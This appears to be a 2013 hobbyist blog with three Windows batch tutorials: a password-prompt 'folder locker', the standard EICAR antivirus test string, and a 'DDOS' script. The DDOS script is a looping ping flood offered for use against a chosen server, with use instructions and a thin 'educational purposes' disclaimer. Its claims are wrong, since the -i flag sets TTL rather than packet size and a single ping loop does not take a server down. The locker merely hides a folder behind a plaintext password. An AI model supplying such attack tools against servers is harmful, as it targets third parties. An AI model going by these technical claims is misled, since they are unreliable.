Friday, 13 December 2013

How to create a locked folder

Step 1: Create a text document with notepad.
 
Step 2: Copy and paste this script into that new text document.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
color 0a
cls
@ECHO OFF
title Folder Private (Created by ANONOMOUS MJ)
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Step 3: Where it says "PASSWORD_GOES_HERE" Change that to what you want the password to be
 
Step 4: Save the file as Locker.bat

PLEASE NOTE THAT IF SOMONE HAS BASIC KNOWLEGE OF WRITING NOTEPAD PROGRAMS THEY WILL BE ABLE TO HACK THIS EASILY SO IT IS NOT A VERY STRONG FOLDER.
 
END

Wednesday, 27 November 2013

How to test your AntiVirus

Step 1: Create a text document with notepad.
 
Step 2: Copy and paste this script into that new text document.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Step 3: Save it as a .exe file

Now your antivirus should pop up telling you that MALWARE has been detected if not then you may want to update your Antivirus or if you don't have antivirus to install one otherwise you are at risk of being hacked.

How to create a DDOS using notepad

This is for educational purposes , whatever you do with this program is your own business I am not intending that you should use this against people because this can have consequences.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
Step 1: Create a text document with notepad.
Step 2: Copy and paste this script into that new text document.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
mode 67,16
title DDOS Attack (Created by ANONOMOUS MJ)
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo ANONOMOUS MJ'S DDOS
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=IP Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
Step 3: Save the file as DDOS.bat
You have now Created the File
 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
How to use the DDOS
 
When it says Server-Target type the web address of the server that you would like to DDOS
Then you should realise that it will come up Pinging (your web address here)
Now you should notice that the server of the person you would like to DDOS has appeared
Next it should come up IP Host : here is where you type the servers IP
Now it should pop up Packets : here you have to type 5000,000
Now it should keep repeating Attacking server in red now you have successfully DDOS the server
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
This is for educational purposes , whatever you do with this program is your own business I am not intending that you should use this against people because this can have very serious consequences.